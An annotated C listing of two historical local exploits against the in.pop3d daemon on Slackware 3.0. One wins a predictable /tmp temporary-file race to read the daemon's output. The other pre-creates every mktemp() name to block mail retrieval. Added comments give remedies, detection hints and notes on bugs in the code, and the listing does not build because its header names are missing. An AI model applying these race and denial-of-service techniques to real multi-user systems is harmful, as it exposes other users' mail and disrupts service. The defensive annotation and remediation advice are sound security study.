/*
 * pop3d-exploit.c: Dave M. (davem@cmu.edu)
 *
 * Historical proof of concept for a temporary-file race in in.pop3d
 * (/usr/sbin/in.pop3d under Slackware 3.0). It pre-creates a file at the
 * name the daemon is expected to pick for its temporary file, so that data
 * the daemon writes there can be read by the user running this program.
 * The author notes that the race is NOT always won and may need extreme
 * conditions to have a high probability of success.
 *
 * Defender's reading: the weakness demonstrated is a temporary file in a
 * world-writable directory whose name can be predicted from the process id
 * (a mktemp()-style template, per the second listing below). The daemon's
 * own code is not shown on this page, so the exact open call is an
 * assumption. The usual remedy is to create the file atomically and
 * privately -- mkstemp(), or open() with O_CREAT | O_EXCL and mode 0600 --
 * in a directory only the daemon can write, and to treat a pre-existing
 * file as an error. Files under /tmp that match the daemon's template but
 * are not owned by the daemon's user, or that are world-readable or
 * world-writable, and a file named /tmp/pop.exploit, are artefacts of this
 * program worth alerting on.
 *
 * The header names after each #include below were lost when the page was
 * extracted; the listing does not build as shown.
 */
#include
#include
#include
#include

main(int argc, char **argv)
{
    int race;                  /* descriptor returned by creat(); not used afterwards */
    int i;
    char fname[80], tmpf[80];  /* hold filename; fname is never used */

    /* Clear the umask so the mode given to creat() below is applied as-is. */
    umask(0);

    /*
     * NOTE(review): argc is normally at least 1, so this usage branch is
     * not taken and argv[1] is read below without having been checked.
     */
    if(argc<1) {
        printf("pop3 racer\nSyntax: %s process-id\n",argv[0]);
        return -1;
    }

    /*
     * Build the predicted name: the "/tmp/pop3" prefix, then the process id
     * from argv[1] left-padded with '0' to six characters, then overwrite
     * the first character after the prefix (index 9) with 'a'.
     * NOTE(review): strcpy()/strcat() copy argv[1] with no length check
     * into the 80-byte buffer.
     */
    strcpy(tmpf,"/tmp/pop3");
    for(i=strlen(argv[1]);i<6;i++)
        strcat(tmpf,"0");
    strcat(tmpf,argv[1]);
    tmpf[9] = 'a';

    /* Create the file readable and writable by owner, group and others. */
    race = creat(tmpf,S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);

    /*
     * Keep moving the file away from the predicted name and back again.
     * Presumably this is meant to let the daemon's "is this name free?"
     * check and its later open see different states -- a
     * time-of-check/time-of-use gap; confirm against the daemon's source.
     * The loop only ends when the rename back fails.
     */
    while(1) {
        rename(tmpf,"/tmp/pop.exploit");
        if(rename("/tmp/pop.exploit",tmpf) < 0) {
            printf("race lost - file created.\n"); /* catch 1/2 the losses */
            break;
        }
    }
}

/* The other exploit. deny-mktemp.c: */

/*
 * Dave M. (davem@cmu.edu)
 *
 * This program opens the complete set of temporary files tested with
 * mktemp() for a given template (with 6 X's), usually resulting in the
 * program terminating upon failure to find an open file. In pop3d, this
 * prevents a pop client from reading their mail.
 *
 * Defender's reading: this is a denial of service against a service that
 * gives up when every candidate name for its template already exists in a
 * shared directory. Keeping the service's temporary files in a private
 * directory, and using mkstemp() rather than a small predictable name set,
 * removes the dependency on names other local users can occupy. A burst of
 * empty files sharing the template prefix and one process-id suffix is the
 * observable trace.
 *
 * As above, the header names after each #include were lost in extraction.
 */
#include
#include
#include
#include
#include

/* template found in program's header file, minus X's */
#define TEMPLATE "/tmp/pop3"

main(int argc, char **argv)
{
    long int i,j;
    char fname[20];

    /*
     * NOTE(review): the format string contains %s but no matching argument
     * is passed to printf().
     */
    if(argc<2) {
        printf("Syntax: %s process-id\n");
        return -1;
    }

    /* j indexes the first character after the template prefix. */
    j = strlen(TEMPLATE);

    /*
     * Same name construction as the first listing: prefix, '0' padding to
     * six characters, then argv[1].
     * NOTE(review): no length check on argv[1] against the 20-byte buffer.
     */
    strcpy(fname,TEMPLATE);
    for(i=strlen(argv[1]);i<6;i++)
        strcat(fname,"0");
    strcat(fname,argv[1]);

    /*
     * For each candidate character, put it at position j and create the
     * file. The second argument of creat() is a permission mode; open(2)
     * flag constants are passed here, so the resulting permission bits are
     * whatever those flag values happen to encode. Return values are
     * ignored.
     */

    /* Lower-case letters 'a' through 'z'. */
    for(i=0;i<26;i++) {
        fname[j] = 'a' + i;
        creat(fname,O_WRONLY | O_CREAT);
    }

    /* Upper-case letters 'A' through 'Z'. */
    for(i=0;i<26;i++) {
        fname[j] = 'A' + i;
        creat(fname,O_WRONLY | O_CREAT);
    }

    /* Digits '0' through '8', as bounded by the loop condition. */
    for(i=0;i<9;i++) {
        fname[j] = '0' + i;
        creat(fname,O_WRONLY | O_CREAT);
    }
}